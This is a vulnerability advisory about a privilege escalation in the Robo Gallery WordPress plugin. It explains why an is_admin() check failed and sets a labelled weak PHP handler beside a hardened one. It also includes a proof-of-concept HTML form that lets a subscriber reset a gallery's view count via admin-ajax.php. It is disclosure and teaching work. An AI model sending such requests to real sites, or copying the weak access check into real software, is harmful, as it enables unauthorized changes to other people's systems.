While reviewing a false report of a vulnerability in the Robo Gallery plugin today we noticed that the plugin actually had a privilege escalation vulnerability in the code mentioned in that other report. In version 2.0.15, and some prior versions, the function rbs_gallery_ajax_callback in the file /includes/rbs_gallery_ajax.php allows anyone logged in to WordPress to access the functions in the file /includes/extensions/rbs_create_post_ajax.php, functions that should not be available to every user role.
In version 2.0.15 an attempt was made to stop this by restricting access to the function rbs_gallery_ajax_callback to administrators using the function is_admin(). The problem with that is that the function doesn’t actually check whether a user is an administrator. Instead it checks “if the Dashboard or the administration panel is attempting to be displayed”. Since it “will return true when trying to make an ajax request (both front-end and back-end requests)”, the check had no effect here, because the vulnerable code path is reached through an ajax request.
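To make the distinction concrete, here is an added illustration (not the plugin's code, and not a patch from its developer) that places the is_admin() pattern beside the checks an admin-ajax.php handler actually needs: a nonce bound to the action and a capability test on the current user. The handler names, the action name example_gallery, the nonce name and the chosen capability manage_options are assumptions for the example.

```php
<?php
// Added example, not Robo Gallery's code. Handler, action and nonce names
// (example_ajax_*, example_gallery, example_gallery_nonce) are assumptions.

// Weak: is_admin() only reports that the request targets the admin area.
// Every call to wp-admin/admin-ajax.php satisfies that, including one made
// by a subscriber, so this gate admits any logged-in user.
function example_ajax_weak() {
    if ( ! is_admin() ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    // ... privileged work would proceed here for any logged-in user ...
    wp_send_json_success();
}

// Hardened: first verify a nonce tied to this specific action (CSRF guard),
// then require the capability the operation genuinely needs.
function example_ajax_hardened() {
    check_ajax_referer( 'example_gallery_nonce', 'nonce' ); // dies on failure

    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // Validate input before acting on it: a non-numeric or zero id is rejected.
    $gallery_id = isset( $_POST['galleryid'] ) ? absint( $_POST['galleryid'] ) : 0;
    if ( 0 === $gallery_id ) {
        wp_send_json_error( 'bad request', 400 );
    }

    // ... privileged work (e.g. resetting a per-gallery counter) goes here ...
    wp_send_json_success( array( 'galleryid' => $gallery_id ) );
}

// wp_ajax_{action} fires only for logged-in users; the handler still
// re-checks capability because "logged in" is not the same as "administrator".
add_action( 'wp_ajax_example_gallery', 'example_ajax_hardened' );

// The nonce is issued to the admin page that makes the request, e.g. via
// wp_localize_script( 'example-admin', 'exampleAjax',
//     array( 'nonce' => wp_create_nonce( 'example_gallery_nonce' ) ) );
```

The capability to require depends on what the handler does; manage_options is used above as a stand-in for "administrator-only", and a handler that edits a specific post would more naturally test edit_post against that post's ID.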
Proof of Concept
The following proof of concept will reset a gallery’s view count to 0.
Make sure you are logged in to WordPress, ideally as a subscriber since they have the least capabilities. Also, make sure to replace “[path to WordPress]” with the location of WordPress and “[id of gallery]” with the ID of the gallery you are resetting the view count of.
<html>
<head>
</head>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=rbs_gallery" method="post">
<input type="hidden" name="function" value="reset_views" />
<input type="hidden" name="galleryid" value="[id of gallery]" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
- 4/12/2016 – Developer notified that the issue has not been resolved.
- 4/12/2016 – Developer responds that fix forthcoming.
- 4/16/2016 – Version 2.0.17 released, which fixes vulnerability.